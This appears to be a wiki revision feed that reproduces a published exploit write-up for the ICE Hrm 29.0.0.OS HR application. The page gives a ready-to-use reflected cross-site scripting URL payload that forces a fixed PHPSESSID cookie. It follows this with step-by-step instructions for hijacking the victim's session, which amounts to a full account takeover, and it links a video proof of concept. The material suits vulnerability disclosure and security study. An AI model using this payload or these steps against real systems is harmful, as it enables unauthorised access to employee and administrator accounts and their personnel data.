https://pwnwiki.com/index.php?action=history&feed=atom&title=ICE_Hrm_29.0.0.OS_XSS%E6%BC%8F%E6%B4%9EICE Hrm 29.0.0.OS XSS漏洞 - Revision history2026-04-15T02:42:42ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=ICE_Hrm_29.0.0.OS_XSS%E6%BC%8F%E6%B4%9E&diff=5371&oldid=prevPwnwiki: Created page with "<pre> # Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation # Exploit Author: *Piyush Patil *& Rafal Lykowski # Vendor Homepage: ht..."2021-06-19T01:16:44Z<p>Created page with "<pre> # Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation # Exploit Author: *Piyush Patil *& Rafal Lykowski # Vendor Homepage: ht..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation<br />
# Exploit Author: *Piyush Patil *& Rafal Lykowski<br />
# Vendor Homepage: https://icehrm.com/<br />
# Version: 29.0.0.OS<br />
# Tested on: Windows 10 and Kali<br />
<br />
#Description<br />
ICE Hrm Version 29.0.0.OS is vulnerable to session fixation and reflected cross site scripting leading to full account takeover.<br />
<br />
#Steps to reproduce the attack:<br />
1-Open 2 different browsers (or one with 2 windows - one of them opened in incognito mode)<br />
2-Log in to the system, <br />
3-Paste this payload into the address bar and load it:<br />
http://localhost:8070/app/?g=admin&n=dashboard&m=21484%27%3bdocument.cookie=%22PHPSESSID=12345;path=/;%22%2f%2f<br />
It simulates victim executing XSS.<br />
4-In the incognito window do not log in but just modify session cookie value to 12345.<br />
5-Navigate to any application url - you will realize that you are authorized. It means that your account was taken over.<br />
<br />
#Video POC:<br />
https://drive.google.com/file/d/1egynTGh0XsETgfu7SJtIPv1GZCs1dJ67/view?usp=sharing<br />
</pre></div>Pwnwiki